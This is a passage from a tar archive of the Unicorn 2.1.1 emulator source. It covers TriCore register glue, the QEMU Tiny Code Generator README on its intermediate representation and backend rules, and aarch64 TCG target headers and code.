g_free(desc->iotlb); g_free(fast->table); } } DEFAULT_VISIBILITY void uc_init(struct uc_struct *uc) { uc->reg_read = reg_read; uc->reg_write = reg_write; uc->reg_reset = reg_reset; uc->set_pc = tricore_set_pc; uc->get_pc = tricore_get_pc; uc->cpus_init = tricore_cpus_init; uc->release = tricore_release; uc->cpu_context_size = offsetof(CPUTriCoreState, end_reset_fields); uc_common_init(uc); } �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/tricore/unicorn.h���������������������������������������������������������0000664�0000000�0000000�00000001127�14675241067�0020737�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Unicorn Emulator Engine */ /* By Nguyen Anh Quynh <aquynh@gmail.com>, 2015 */ /* Modified for Unicorn Engine by Eric Poole <eric.poole@aptiv.com>, 2022 Copyright 2022 Aptiv */ #ifndef UC_QEMU_TARGET_TRICORE_H #define UC_QEMU_TARGET_TRICORE_H // functions to read & write registers uc_err reg_read_tricore(void *env, int mode, unsigned int regid, void *value, size_t *size); uc_err reg_write_tricore(void *env, int mode, unsigned int regid, const void *value, size_t *size, int *setpc); void uc_init_tricore(struct uc_struct *uc); #endif �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/tcg/�����������������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0014730�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/tcg/README�����������������������������������������������������������������������0000664�0000000�0000000�00000054727�14675241067�0015627�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������Tiny Code Generator - Fabrice Bellard. 1) Introduction TCG (Tiny Code Generator) began as a generic backend for a C compiler. It was simplified to be used in QEMU. It also has its roots in the QOP code generator written by Paul Brook. 2) Definitions TCG receives RISC-like "TCG ops" and performs some optimizations on them, including liveness analysis and trivial constant expression evaluation. TCG ops are then implemented in the host CPU back end, also known as the TCG "target". The TCG "target" is the architecture for which we generate the code. It is of course not the same as the "target" of QEMU which is the emulated architecture. As TCG started as a generic C backend used for cross compiling, it is assumed that the TCG target is different from the host, although it is never the case for QEMU. In this document, we use "guest" to specify what architecture we are emulating; "target" always means the TCG target, the machine on which we are running QEMU. A TCG "function" corresponds to a QEMU Translated Block (TB). A TCG "temporary" is a variable only live in a basic block. Temporaries are allocated explicitly in each function. A TCG "local temporary" is a variable only live in a function. Local temporaries are allocated explicitly in each function. A TCG "global" is a variable which is live in all the functions (equivalent of a C global variable). They are defined before the functions defined. A TCG global can be a memory location (e.g. a QEMU CPU register), a fixed host register (e.g. the QEMU CPU state pointer) or a memory location which is stored in a register outside QEMU TBs (not implemented yet). A TCG "basic block" corresponds to a list of instructions terminated by a branch instruction. An operation with "undefined behavior" may result in a crash. An operation with "unspecified behavior" shall not crash. However, the result may be one of several possibilities so may be considered an "undefined result". 3) Intermediate representation 3.1) Introduction TCG instructions operate on variables which are temporaries, local temporaries or globals. TCG instructions and variables are strongly typed. Two types are supported: 32 bit integers and 64 bit integers. Pointers are defined as an alias to 32 bit or 64 bit integers depending on the TCG target word size. Each instruction has a fixed number of output variable operands, input variable operands and always constant operands. The notable exception is the call instruction which has a variable number of outputs and inputs. In the textual form, output operands usually come first, followed by input operands, followed by constant operands. The output type is included in the instruction name. Constants are prefixed with a '$'. add_i32 t0, t1, t2 (t0 <- t1 + t2) 3.2) Assumptions * Basic blocks - Basic blocks end after branches (e.g. brcond_i32 instruction), goto_tb and exit_tb instructions. - Basic blocks start after the end of a previous basic block, or at a set_label instruction. After the end of a basic block, the content of temporaries is destroyed, but local temporaries and globals are preserved. * Floating point types are not supported yet * Pointers: depending on the TCG target, pointer size is 32 bit or 64 bit. The type TCG_TYPE_PTR is an alias to TCG_TYPE_I32 or TCG_TYPE_I64. * Helpers: Using the tcg_gen_helper_x_y it is possible to call any function taking i32, i64 or pointer types. By default, before calling a helper, all globals are stored at their canonical location and it is assumed that the function can modify them. By default, the helper is allowed to modify the CPU state or raise an exception. This can be overridden using the following function modifiers: - TCG_CALL_NO_READ_GLOBALS means that the helper does not read globals, either directly or via an exception. They will not be saved to their canonical locations before calling the helper. - TCG_CALL_NO_WRITE_GLOBALS means that the helper does not modify any globals. They will only be saved to their canonical location before calling helpers, but they won't be reloaded afterwards. - TCG_CALL_NO_SIDE_EFFECTS means that the call to the function is removed if the return value is not used. Note that TCG_CALL_NO_READ_GLOBALS implies TCG_CALL_NO_WRITE_GLOBALS. On some TCG targets (e.g. x86), several calling conventions are supported. * Branches: Use the instruction 'br' to jump to a label. 3.3) Code Optimizations When generating instructions, you can count on at least the following optimizations: - Single instructions are simplified, e.g. and_i32 t0, t0, $0xffffffff is suppressed. - A liveness analysis is done at the basic block level. The information is used to suppress moves from a dead variable to another one. It is also used to remove instructions which compute dead results. The later is especially useful for condition code optimization in QEMU. In the following example: add_i32 t0, t1, t2 add_i32 t0, t0, $1 mov_i32 t0, $1 only the last instruction is kept. 3.4) Instruction Reference ********* Function call * call <ret> <params> ptr call function 'ptr' (pointer type) <ret> optional 32 bit or 64 bit return value <params> optional 32 bit or 64 bit parameters ********* Jumps/Labels * set_label $label Define label 'label' at the current program point. * br $label Jump to label. * brcond_i32/i64 t0, t1, cond, label Conditional jump if t0 cond t1 is true. cond can be: TCG_COND_EQ TCG_COND_NE TCG_COND_LT /* signed */ TCG_COND_GE /* signed */ TCG_COND_LE /* signed */ TCG_COND_GT /* signed */ TCG_COND_LTU /* unsigned */ TCG_COND_GEU /* unsigned */ TCG_COND_LEU /* unsigned */ TCG_COND_GTU /* unsigned */ ********* Arithmetic * add_i32/i64 t0, t1, t2 t0=t1+t2 * sub_i32/i64 t0, t1, t2 t0=t1-t2 * neg_i32/i64 t0, t1 t0=-t1 (two's complement) * mul_i32/i64 t0, t1, t2 t0=t1*t2 * div_i32/i64 t0, t1, t2 t0=t1/t2 (signed). Undefined behavior if division by zero or overflow. * divu_i32/i64 t0, t1, t2 t0=t1/t2 (unsigned). Undefined behavior if division by zero. * rem_i32/i64 t0, t1, t2 t0=t1%t2 (signed). Undefined behavior if division by zero or overflow. * remu_i32/i64 t0, t1, t2 t0=t1%t2 (unsigned). Undefined behavior if division by zero. ********* Logical * and_i32/i64 t0, t1, t2 t0=t1&t2 * or_i32/i64 t0, t1, t2 t0=t1|t2 * xor_i32/i64 t0, t1, t2 t0=t1^t2 * not_i32/i64 t0, t1 t0=~t1 * andc_i32/i64 t0, t1, t2 t0=t1&~t2 * eqv_i32/i64 t0, t1, t2 t0=~(t1^t2), or equivalently, t0=t1^~t2 * nand_i32/i64 t0, t1, t2 t0=~(t1&t2) * nor_i32/i64 t0, t1, t2 t0=~(t1|t2) * orc_i32/i64 t0, t1, t2 t0=t1|~t2 * clz_i32/i64 t0, t1, t2 t0 = t1 ? clz(t1) : t2 * ctz_i32/i64 t0, t1, t2 t0 = t1 ? ctz(t1) : t2 ********* Shifts/Rotates * shl_i32/i64 t0, t1, t2 t0=t1 << t2. Unspecified behavior if t2 < 0 or t2 >= 32 (resp 64) * shr_i32/i64 t0, t1, t2 t0=t1 >> t2 (unsigned). Unspecified behavior if t2 < 0 or t2 >= 32 (resp 64) * sar_i32/i64 t0, t1, t2 t0=t1 >> t2 (signed). Unspecified behavior if t2 < 0 or t2 >= 32 (resp 64) * rotl_i32/i64 t0, t1, t2 Rotation of t2 bits to the left. Unspecified behavior if t2 < 0 or t2 >= 32 (resp 64) * rotr_i32/i64 t0, t1, t2 Rotation of t2 bits to the right. Unspecified behavior if t2 < 0 or t2 >= 32 (resp 64) ********* Misc * mov_i32/i64 t0, t1 t0 = t1 Move t1 to t0 (both operands must have the same type). * ext8s_i32/i64 t0, t1 ext8u_i32/i64 t0, t1 ext16s_i32/i64 t0, t1 ext16u_i32/i64 t0, t1 ext32s_i64 t0, t1 ext32u_i64 t0, t1 8, 16 or 32 bit sign/zero extension (both operands must have the same type) * bswap16_i32/i64 t0, t1 16 bit byte swap on a 32/64 bit value. It assumes that the two/six high order bytes are set to zero. * bswap32_i32/i64 t0, t1 32 bit byte swap on a 32/64 bit value. With a 64 bit value, it assumes that the four high order bytes are set to zero. * bswap64_i64 t0, t1 64 bit byte swap * discard_i32/i64 t0 Indicate that the value of t0 won't be used later. It is useful to force dead code elimination. * deposit_i32/i64 dest, t1, t2, pos, len Deposit T2 as a bitfield into T1, placing the result in DEST. The bitfield is described by POS/LEN, which are immediate values: LEN - the length of the bitfield POS - the position of the first bit, counting from the LSB For example, "deposit_i32 dest, t1, t2, 8, 4" indicates a 4-bit field at bit 8. This operation would be equivalent to dest = (t1 & ~0x0f00) | ((t2 << 8) & 0x0f00) * extract_i32/i64 dest, t1, pos, len * sextract_i32/i64 dest, t1, pos, len Extract a bitfield from T1, placing the result in DEST. The bitfield is described by POS/LEN, which are immediate values, as above for deposit. For extract_*, the result will be extended to the left with zeros; for sextract_*, the result will be extended to the left with copies of the bitfield sign bit at pos + len - 1. For example, "sextract_i32 dest, t1, 8, 4" indicates a 4-bit field at bit 8. This operation would be equivalent to dest = (t1 << 20) >> 28 (using an arithmetic right shift). * extract2_i32/i64 dest, t1, t2, pos For N = {32,64}, extract an N-bit quantity from the concatenation of t2:t1, beginning at pos. The tcg_gen_extract2_{i32,i64} expander accepts 0 <= pos <= N as inputs. The backend code generator will not see either 0 or N as inputs for these opcodes. * extrl_i64_i32 t0, t1 For 64-bit hosts only, extract the low 32-bits of input T1 and place it into 32-bit output T0. Depending on the host, this may be a simple move, or may require additional canonicalization. * extrh_i64_i32 t0, t1 For 64-bit hosts only, extract the high 32-bits of input T1 and place it into 32-bit output T0. Depending on the host, this may be a simple shift, or may require additional canonicalization. ********* Conditional moves * setcond_i32/i64 dest, t1, t2, cond dest = (t1 cond t2) Set DEST to 1 if (T1 cond T2) is true, otherwise set to 0. * movcond_i32/i64 dest, c1, c2, v1, v2, cond dest = (c1 cond c2 ? v1 : v2) Set DEST to V1 if (C1 cond C2) is true, otherwise set to V2. ********* Type conversions * ext_i32_i64 t0, t1 Convert t1 (32 bit) to t0 (64 bit) and does sign extension * extu_i32_i64 t0, t1 Convert t1 (32 bit) to t0 (64 bit) and does zero extension * trunc_i64_i32 t0, t1 Truncate t1 (64 bit) to t0 (32 bit) * concat_i32_i64 t0, t1, t2 Construct t0 (64-bit) taking the low half from t1 (32 bit) and the high half from t2 (32 bit). * concat32_i64 t0, t1, t2 Construct t0 (64-bit) taking the low half from t1 (64 bit) and the high half from t2 (64 bit). ********* Load/Store * ld_i32/i64 t0, t1, offset ld8s_i32/i64 t0, t1, offset ld8u_i32/i64 t0, t1, offset ld16s_i32/i64 t0, t1, offset ld16u_i32/i64 t0, t1, offset ld32s_i64 t0, t1, offset ld32u_i64 t0, t1, offset t0 = read(t1 + offset) Load 8, 16, 32 or 64 bits with or without sign extension from host memory. offset must be a constant. * st_i32/i64 t0, t1, offset st8_i32/i64 t0, t1, offset st16_i32/i64 t0, t1, offset st32_i64 t0, t1, offset write(t0, t1 + offset) Write 8, 16, 32 or 64 bits to host memory. All this opcodes assume that the pointed host memory doesn't correspond to a global. In the latter case the behaviour is unpredictable. ********* Multiword arithmetic support * add2_i32/i64 t0_low, t0_high, t1_low, t1_high, t2_low, t2_high * sub2_i32/i64 t0_low, t0_high, t1_low, t1_high, t2_low, t2_high Similar to add/sub, except that the double-word inputs T1 and T2 are formed from two single-word arguments, and the double-word output T0 is returned in two single-word outputs. * mulu2_i32/i64 t0_low, t0_high, t1, t2 Similar to mul, except two unsigned inputs T1 and T2 yielding the full double-word product T0. The later is returned in two single-word outputs. * muls2_i32/i64 t0_low, t0_high, t1, t2 Similar to mulu2, except the two inputs T1 and T2 are signed. * mulsh_i32/i64 t0, t1, t2 * muluh_i32/i64 t0, t1, t2 Provide the high part of a signed or unsigned multiply, respectively. If mulu2/muls2 are not provided by the backend, the tcg-op generator can obtain the same results can be obtained by emitting a pair of opcodes, mul+muluh/mulsh. ********* Memory Barrier support * mb <$arg> Generate a target memory barrier instruction to ensure memory ordering as being enforced by a corresponding guest memory barrier instruction. The ordering enforced by the backend may be stricter than the ordering required by the guest. It cannot be weaker. This opcode takes a constant argument which is required to generate the appropriate barrier instruction. The backend should take care to emit the target barrier instruction only when necessary i.e., for SMP guests and when MTTCG is enabled. The guest translators should generate this opcode for all guest instructions which have ordering side effects. Please see docs/devel/atomics.txt for more information on memory barriers. ********* 64-bit guest on 32-bit host support The following opcodes are internal to TCG. Thus they are to be implemented by 32-bit host code generators, but are not to be emitted by guest translators. They are emitted as needed by inline functions within "tcg-op.h". * brcond2_i32 t0_low, t0_high, t1_low, t1_high, cond, label Similar to brcond, except that the 64-bit values T0 and T1 are formed from two 32-bit arguments. * setcond2_i32 dest, t1_low, t1_high, t2_low, t2_high, cond Similar to setcond, except that the 64-bit values T1 and T2 are formed from two 32-bit arguments. The result is a 32-bit value. ********* QEMU specific operations * exit_tb t0 Exit the current TB and return the value t0 (word type). * goto_tb index Exit the current TB and jump to the TB index 'index' (constant) if the current TB was linked to this TB. Otherwise execute the next instructions. Only indices 0 and 1 are valid and tcg_gen_goto_tb may be issued at most once with each slot index per TB. * lookup_and_goto_ptr tb_addr Look up a TB address ('tb_addr') and jump to it if valid. If not valid, jump to the TCG epilogue to go back to the exec loop. This operation is optional. If the TCG backend does not implement the goto_ptr opcode, emitting this op is equivalent to emitting exit_tb(0). * qemu_ld_i32/i64 t0, t1, flags, memidx * qemu_st_i32/i64 t0, t1, flags, memidx Load data at the guest address t1 into t0, or store data in t0 at guest address t1. The _i32/_i64 size applies to the size of the input/output register t0 only. The address t1 is always sized according to the guest, and the width of the memory operation is controlled by flags. Both t0 and t1 may be split into little-endian ordered pairs of registers if dealing with 64-bit quantities on a 32-bit host. The memidx selects the qemu tlb index to use (e.g. user or kernel access). The flags are the MemOp bits, selecting the sign, width, and endianness of the memory access. For a 32-bit host, qemu_ld/st_i64 is guaranteed to only be used with a 64-bit memory access specified in flags. ********* Host vector operations All of the vector ops have two parameters, TCGOP_VECL & TCGOP_VECE. The former specifies the length of the vector in log2 64-bit units; the later specifies the length of the element (if applicable) in log2 8-bit units. E.g. VECL=1 -> 64 << 1 -> v128, and VECE=2 -> 1 << 2 -> i32. * mov_vec v0, v1 * ld_vec v0, t1 * st_vec v0, t1 Move, load and store. * dup_vec v0, r1 Duplicate the low N bits of R1 into VECL/VECE copies across V0. * dupi_vec v0, c Similarly, for a constant. Smaller values will be replicated to host register size by the expanders. * dup2_vec v0, r1, r2 Duplicate r2:r1 into VECL/64 copies across V0. This opcode is only present for 32-bit hosts. * add_vec v0, v1, v2 v0 = v1 + v2, in elements across the vector. * sub_vec v0, v1, v2 Similarly, v0 = v1 - v2. * mul_vec v0, v1, v2 Similarly, v0 = v1 * v2. * neg_vec v0, v1 Similarly, v0 = -v1. * abs_vec v0, v1 Similarly, v0 = v1 < 0 ? -v1 : v1, in elements across the vector. * smin_vec: * umin_vec: Similarly, v0 = MIN(v1, v2), for signed and unsigned element types. * smax_vec: * umax_vec: Similarly, v0 = MAX(v1, v2), for signed and unsigned element types. * ssadd_vec: * sssub_vec: * usadd_vec: * ussub_vec: Signed and unsigned saturating addition and subtraction. If the true result is not representable within the element type, the element is set to the minimum or maximum value for the type. * and_vec v0, v1, v2 * or_vec v0, v1, v2 * xor_vec v0, v1, v2 * andc_vec v0, v1, v2 * orc_vec v0, v1, v2 * not_vec v0, v1 Similarly, logical operations with and without complement. Note that VECE is unused. * shli_vec v0, v1, i2 * shls_vec v0, v1, s2 Shift all elements from v1 by a scalar i2/s2. I.e. for (i = 0; i < VECL/VECE; ++i) { v0[i] = v1[i] << s2; } * shri_vec v0, v1, i2 * sari_vec v0, v1, i2 * shrs_vec v0, v1, s2 * sars_vec v0, v1, s2 Similarly for logical and arithmetic right shift. * shlv_vec v0, v1, v2 Shift elements from v1 by elements from v2. I.e. for (i = 0; i < VECL/VECE; ++i) { v0[i] = v1[i] << v2[i]; } * shrv_vec v0, v1, v2 * sarv_vec v0, v1, v2 Similarly for logical and arithmetic right shift. * cmp_vec v0, v1, v2, cond Compare vectors by element, storing -1 for true and 0 for false. * bitsel_vec v0, v1, v2, v3 Bitwise select, v0 = (v2 & v1) | (v3 & ~v1), across the entire vector. * cmpsel_vec v0, c1, c2, v3, v4, cond Select elements based on comparison results: for (i = 0; i < n; ++i) { v0[i] = (c1[i] cond c2[i]) ? v3[i] : v4[i]. } ********* Note 1: Some shortcuts are defined when the last operand is known to be a constant (e.g. addi for add, movi for mov). Note 2: When using TCG, the opcodes must never be generated directly as some of them may not be available as "real" opcodes. Always use the function tcg_gen_xxx(args). 4) Backend tcg-target.h contains the target specific definitions. tcg-target.inc.c contains the target specific code; it is #included by tcg/tcg.c, rather than being a standalone C file. 4.1) Assumptions The target word size (TCG_TARGET_REG_BITS) is expected to be 32 bit or 64 bit. It is expected that the pointer has the same size as the word. On a 32 bit target, all 64 bit operations are converted to 32 bits. A few specific operations must be implemented to allow it (see add2_i32, sub2_i32, brcond2_i32). On a 64 bit target, the values are transferred between 32 and 64-bit registers using the following ops: - trunc_shr_i64_i32 - ext_i32_i64 - extu_i32_i64 They ensure that the values are correctly truncated or extended when moved from a 32-bit to a 64-bit register or vice-versa. Note that the trunc_shr_i64_i32 is an optional op. It is not necessary to implement it if all the following conditions are met: - 64-bit registers can hold 32-bit values - 32-bit values in a 64-bit register do not need to stay zero or sign extended - all 32-bit TCG ops ignore the high part of 64-bit registers Floating point operations are not supported in this version. A previous incarnation of the code generator had full support of them, but it is better to concentrate on integer operations first. 4.2) Constraints GCC like constraints are used to define the constraints of every instruction. Memory constraints are not supported in this version. Aliases are specified in the input operands as for GCC. The same register may be used for both an input and an output, even when they are not explicitly aliased. If an op expands to multiple target instructions then care must be taken to avoid clobbering input values. GCC style "early clobber" outputs are supported, with '&'. A target can define specific register or constant constraints. If an operation uses a constant input constraint which does not allow all constants, it must also accept registers in order to have a fallback. The constraint 'i' is defined generically to accept any constant. The constraint 'r' is not defined generically, but is consistently used by each backend to indicate all registers. The movi_i32 and movi_i64 operations must accept any constants. The mov_i32 and mov_i64 operations must accept any registers of the same type. The ld/st/sti instructions must accept signed 32 bit constant offsets. This can be implemented by reserving a specific register in which to compute the address if the offset is too big. The ld/st instructions must accept any destination (ld) or source (st) register. The sti instruction may fail if it cannot store the given constant. 4.3) Function call assumptions - The only supported types for parameters and return value are: 32 and 64 bit integers and pointer. - The stack grows downwards. - The first N parameters are passed in registers. - The next parameters are passed on the stack by storing them as words. - Some registers are clobbered during the call. - The function can return 0 or 1 value in registers. On a 32 bit target, functions must be able to return 2 values in registers for 64 bit return type. 5) Recommended coding rules for best performance - Use globals to represent the parts of the QEMU CPU state which are often modified, e.g. the integer registers and the condition codes. TCG will be able to use host registers to store them. - Avoid globals stored in fixed registers. They must be used only to store the pointer to the CPU state and possibly to store a pointer to a register window. - Use temporaries. Use local temporaries only when really needed, e.g. when you need to use a value after a jump. Local temporaries introduce a performance hit in the current TCG implementation: their content is saved to memory at end of each basic block. - Free temporaries and local temporaries when they are no longer used (tcg_temp_free). Since tcg_const_x() also creates a temporary, you should free it after it is used. Freeing temporaries does not yield a better generated code, but it reduces the memory usage of TCG and the speed of the translation. - Don't hesitate to use helpers for complicated or seldom used guest instructions. There is little performance advantage in using TCG to implement guest instructions taking more than about twenty TCG instructions. Note that this rule of thumb is more applicable to helpers doing complex logic or arithmetic, where the C compiler has scope to do a good job of optimisation; it is less relevant where the instruction is mostly doing loads and stores, and in those cases inline TCG may still be faster for longer sequences. - The hard limit on the number of TCG instructions you can generate per guest instruction is set by MAX_OP_PER_INSTR in exec-all.h -- you cannot exceed this without risking a buffer overrun. - Use the 'discard' instruction if you know that TCG won't be able to prove that a given global is "dead" at a given program point. The x86 guest uses it to improve the condition codes optimisation. �����������������������������������������unicorn-2.1.1/qemu/tcg/aarch64/���������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0016160�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/tcg/aarch64/tcg-target.h���������������������������������������������������������0000664�0000000�0000000�00000014105�14675241067�0020373�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Initial TCG Implementation for aarch64 * * Copyright (c) 2013 Huawei Technologies Duesseldorf GmbH * Written by Claudio Fontana * * This work is licensed under the terms of the GNU GPL, version 2 or * (at your option) any later version. * * See the COPYING file in the top-level directory for details. */ #ifndef AARCH64_TCG_TARGET_H #define AARCH64_TCG_TARGET_H #if defined(__APPLE__) #include <libkern/OSCacheControl.h> #endif #define TCG_TARGET_INSN_UNIT_SIZE 4 #define TCG_TARGET_TLB_DISPLACEMENT_BITS 24 #undef TCG_TARGET_STACK_GROWSUP typedef enum { TCG_REG_X0, TCG_REG_X1, TCG_REG_X2, TCG_REG_X3, TCG_REG_X4, TCG_REG_X5, TCG_REG_X6, TCG_REG_X7, TCG_REG_X8, TCG_REG_X9, TCG_REG_X10, TCG_REG_X11, TCG_REG_X12, TCG_REG_X13, TCG_REG_X14, TCG_REG_X15, TCG_REG_X16, TCG_REG_X17, TCG_REG_X18, TCG_REG_X19, TCG_REG_X20, TCG_REG_X21, TCG_REG_X22, TCG_REG_X23, TCG_REG_X24, TCG_REG_X25, TCG_REG_X26, TCG_REG_X27, TCG_REG_X28, TCG_REG_X29, TCG_REG_X30, /* X31 is either the stack pointer or zero, depending on context. */ TCG_REG_SP = 31, TCG_REG_XZR = 31, TCG_REG_V0 = 32, TCG_REG_V1, TCG_REG_V2, TCG_REG_V3, TCG_REG_V4, TCG_REG_V5, TCG_REG_V6, TCG_REG_V7, TCG_REG_V8, TCG_REG_V9, TCG_REG_V10, TCG_REG_V11, TCG_REG_V12, TCG_REG_V13, TCG_REG_V14, TCG_REG_V15, TCG_REG_V16, TCG_REG_V17, TCG_REG_V18, TCG_REG_V19, TCG_REG_V20, TCG_REG_V21, TCG_REG_V22, TCG_REG_V23, TCG_REG_V24, TCG_REG_V25, TCG_REG_V26, TCG_REG_V27, TCG_REG_V28, TCG_REG_V29, TCG_REG_V30, TCG_REG_V31, /* Aliases. */ TCG_REG_FP = TCG_REG_X29, TCG_REG_LR = TCG_REG_X30, TCG_AREG0 = TCG_REG_X19, } TCGReg; #define TCG_TARGET_NB_REGS 64 /* used for function call generation */ #define TCG_REG_CALL_STACK TCG_REG_SP #define TCG_TARGET_STACK_ALIGN 16 #define TCG_TARGET_CALL_ALIGN_ARGS 1 #define TCG_TARGET_CALL_STACK_OFFSET 0 /* optional instructions */ #define TCG_TARGET_HAS_div_i32 1 #define TCG_TARGET_HAS_rem_i32 1 #define TCG_TARGET_HAS_ext8s_i32 1 #define TCG_TARGET_HAS_ext16s_i32 1 #define TCG_TARGET_HAS_ext8u_i32 1 #define TCG_TARGET_HAS_ext16u_i32 1 #define TCG_TARGET_HAS_bswap16_i32 1 #define TCG_TARGET_HAS_bswap32_i32 1 #define TCG_TARGET_HAS_not_i32 1 #define TCG_TARGET_HAS_neg_i32 1 #define TCG_TARGET_HAS_rot_i32 1 #define TCG_TARGET_HAS_andc_i32 1 #define TCG_TARGET_HAS_orc_i32 1 #define TCG_TARGET_HAS_eqv_i32 1 #define TCG_TARGET_HAS_nand_i32 0 #define TCG_TARGET_HAS_nor_i32 0 #define TCG_TARGET_HAS_clz_i32 1 #define TCG_TARGET_HAS_ctz_i32 1 #define TCG_TARGET_HAS_ctpop_i32 0 #define TCG_TARGET_HAS_deposit_i32 1 #define TCG_TARGET_HAS_extract_i32 1 #define TCG_TARGET_HAS_sextract_i32 1 #define TCG_TARGET_HAS_extract2_i32 1 #define TCG_TARGET_HAS_movcond_i32 1 #define TCG_TARGET_HAS_add2_i32 1 #define TCG_TARGET_HAS_sub2_i32 1 #define TCG_TARGET_HAS_mulu2_i32 0 #define TCG_TARGET_HAS_muls2_i32 0 #define TCG_TARGET_HAS_muluh_i32 0 #define TCG_TARGET_HAS_mulsh_i32 0 #define TCG_TARGET_HAS_extrl_i64_i32 0 #define TCG_TARGET_HAS_extrh_i64_i32 0 #define TCG_TARGET_HAS_goto_ptr 1 #define TCG_TARGET_HAS_div_i64 1 #define TCG_TARGET_HAS_rem_i64 1 #define TCG_TARGET_HAS_ext8s_i64 1 #define TCG_TARGET_HAS_ext16s_i64 1 #define TCG_TARGET_HAS_ext32s_i64 1 #define TCG_TARGET_HAS_ext8u_i64 1 #define TCG_TARGET_HAS_ext16u_i64 1 #define TCG_TARGET_HAS_ext32u_i64 1 #define TCG_TARGET_HAS_bswap16_i64 1 #define TCG_TARGET_HAS_bswap32_i64 1 #define TCG_TARGET_HAS_bswap64_i64 1 #define TCG_TARGET_HAS_not_i64 1 #define TCG_TARGET_HAS_neg_i64 1 #define TCG_TARGET_HAS_rot_i64 1 #define TCG_TARGET_HAS_andc_i64 1 #define TCG_TARGET_HAS_orc_i64 1 #define TCG_TARGET_HAS_eqv_i64 1 #define TCG_TARGET_HAS_nand_i64 0 #define TCG_TARGET_HAS_nor_i64 0 #define TCG_TARGET_HAS_clz_i64 1 #define TCG_TARGET_HAS_ctz_i64 1 #define TCG_TARGET_HAS_ctpop_i64 0 #define TCG_TARGET_HAS_deposit_i64 1 #define TCG_TARGET_HAS_extract_i64 1 #define TCG_TARGET_HAS_sextract_i64 1 #define TCG_TARGET_HAS_extract2_i64 1 #define TCG_TARGET_HAS_movcond_i64 1 #define TCG_TARGET_HAS_add2_i64 1 #define TCG_TARGET_HAS_sub2_i64 1 #define TCG_TARGET_HAS_mulu2_i64 0 #define TCG_TARGET_HAS_muls2_i64 0 #define TCG_TARGET_HAS_muluh_i64 1 #define TCG_TARGET_HAS_mulsh_i64 1 #define TCG_TARGET_HAS_direct_jump 1 #define TCG_TARGET_HAS_v64 1 #define TCG_TARGET_HAS_v128 1 #define TCG_TARGET_HAS_v256 0 #define TCG_TARGET_HAS_andc_vec 1 #define TCG_TARGET_HAS_orc_vec 1 #define TCG_TARGET_HAS_not_vec 1 #define TCG_TARGET_HAS_neg_vec 1 #define TCG_TARGET_HAS_abs_vec 1 #define TCG_TARGET_HAS_shi_vec 1 #define TCG_TARGET_HAS_shs_vec 0 #define TCG_TARGET_HAS_shv_vec 1 #define TCG_TARGET_HAS_cmp_vec 1 #define TCG_TARGET_HAS_mul_vec 1 #define TCG_TARGET_HAS_sat_vec 1 #define TCG_TARGET_HAS_minmax_vec 1 #define TCG_TARGET_HAS_bitsel_vec 1 #define TCG_TARGET_HAS_cmpsel_vec 0 #define TCG_TARGET_DEFAULT_MO (0) #define TCG_TARGET_HAS_MEMORY_BSWAP 1 static inline void flush_icache_range(uintptr_t start, uintptr_t stop) { #if defined(__APPLE__) /* * On Intel-based Mac computers, this function does nothing. * Source: https://developer.apple.com/documentation/apple_silicon/porting_just-in-time_compilers_to_apple_silicon?language=objc */ sys_icache_invalidate((char *)start, stop - start); #else __builtin___clear_cache((char *)start, (char *)stop); #endif } void tb_target_set_jmp_target(uintptr_t, uintptr_t, uintptr_t); #ifdef CONFIG_SOFTMMU #define TCG_TARGET_NEED_LDST_LABELS #endif #define TCG_TARGET_NEED_POOL_LABELS #endif /* AARCH64_TCG_TARGET_H */ �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/tcg/aarch64/tcg-target.inc.c�����������������������������������������������������0000664�0000000�0000000�00000270525�14675241067�0021150�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Initial TCG Implementation for aarch64 * * Copyright (c) 2013 Huawei Technologies Duesseldorf GmbH * Written by Claudio Fontana * * This work is licensed under the terms of the GNU GPL, version 2 or * (at your option) any later version. * * See the COPYING file in the top-level directory for details. */ #include "../tcg-pool.inc.c" #include "qemu/bitops.h" /* We're going to re-use TCGType in setting of the SF bit, which controls the size of the operation performed. If we know the values match, it makes things much cleaner. */ QEMU_BUILD_BUG_ON(TCG_TYPE_I32 != 0 || TCG_TYPE_I64 != 1); #ifdef CONFIG_DEBUG_TCG static const char * const tcg_target_reg_names[TCG_TARGET_NB_REGS] = { "x0", "x1", "x2", "x3", "x4", "x5", "x6", "x7", "x8", "x9", "x10", "x11", "x12", "x13", "x14", "x15", "x16", "x17", "x18", "x19", "x20", "x21", "x22", "x23", "x24", "x25", "x26", "x27", "x28", "fp", "x30", "sp", "v0", "v1", "v2", "v3", "v4", "v5", "v6", "v7", "v8", "v9", "v10", "v11", "v12", "v13", "v14", "v15", "v16", "v17", "v18", "v19", "v20", "v21", "v22", "v23", "v24", "v25", "v26", "v27", "v28", "fp", "v30", "v31", }; #endif /* CONFIG_DEBUG_TCG */ static const int tcg_target_reg_alloc_order[] = { TCG_REG_X20, TCG_REG_X21, TCG_REG_X22, TCG_REG_X23, TCG_REG_X24, TCG_REG_X25, TCG_REG_X26, TCG_REG_X27, TCG_REG_X28, /* we will reserve this for guest_base if configured */ TCG_REG_X8, TCG_REG_X9, TCG_REG_X10, TCG_REG_X11, TCG_REG_X12, TCG_REG_X13, TCG_REG_X14, TCG_REG_X15, TCG_REG_X16, TCG_REG_X17, 